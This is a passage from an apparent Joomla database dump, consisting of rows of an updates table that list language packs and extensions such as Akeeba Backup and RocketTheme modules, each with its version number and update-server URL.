Simplified','','pkg_zh-CN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(15236,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(15237,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(15238,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(15239,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(15240,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(15241,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(15242,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(15243,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(15244,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(15245,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(15246,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(15247,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(15248,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(15249,57,0,'English US','','pkg_en-US','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(15250,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(15251,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(15252,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(15253,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.18.5','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(15254,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(15255,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(15256,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(15257,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(15258,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(15259,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(15260,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(15261,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(15262,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(15263,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(15264,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(15265,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(15266,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(15267,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(15268,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(15269,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(15270,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(15271,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(15272,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(15273,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(15274,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(15275,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.11','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-11.html\n				',''),(15276,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(15277,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.4','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-4.html\n				',''),(15278,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15279,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(15280,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15281,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15282,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15283,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15284,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(15285,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15286,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15287,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(15288,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(15289,3,0,'French','','pkg_fr-FR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(15290,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(15291,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(15292,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(15293,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(15294,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(15295,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(15296,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(15297,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(15298,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(15299,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(15300,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(15301,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(15302,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(15303,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(15304,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(15305,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(15306,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(15307,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(15308,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(15309,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(15310,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(15311,3,0,'English US','','pkg_en-US','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(15312,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(15313,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(15314,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(15315,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.18.6','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(15316,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(15317,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(15318,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(15319,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(15320,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(15321,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(15322,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(15323,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(15324,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(15325,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(15326,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(15327,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(15328,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(15329,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(15330,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(15331,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(15332,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(15333,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(15334,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(15335,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(15336,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15337,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(15338,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(15339,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(15340,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(15341,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(15342,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(15343,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(15344,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(15345,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(15346,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(15347,57,0,'French','','pkg_fr-FR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(15348,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(15349,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(15350,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(15351,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(15352,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(15353,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(15354,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(15355,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(15356,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(15357,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(15358,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(15359,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(15360,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(15361,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(15362,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(15363,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(15364,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(15365,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(15366,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(15367,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(15368,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(15369,57,0,'English US','','pkg_en-US','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(15370,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(15371,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(15372,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(15373,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.18.6','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(15374,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(15375,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(15376,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(15377,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(15378,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(15379,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(15380,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(15381,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(15382,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(15383,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(15384,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(15385,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(15386,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(15387,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(15388,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(15389,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(15390,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(15391,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(15392,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(15393,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(15394,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(15395,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.11','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-11.html\n				',''),(15396,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(15397,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.4','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-4.html\n				',''),(15398,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15399,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(15400,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(15401,3,0,'French','','pkg_fr-FR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(15402,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(15403,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(15404,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(15405,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(15406,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(15407,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(15408,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(15409,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(15410,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(15411,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(15412,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(15413,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(15414,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(15415,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(15416,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(15417,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(15418,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(15419,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(15420,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(15421,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(15422,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(15423,3,0,'English US','','pkg_en-US','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(15424,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(15425,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(15426,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(15427,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.18.6','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(15428,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(15429,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(15430,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(15431,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(15432,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(15433,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(15434,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(15435,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(15436,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(15437,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(15438,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(15439,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(15440,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(15441,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(15442,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(15443,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(15444,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(15445,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(15446,3,0,'English 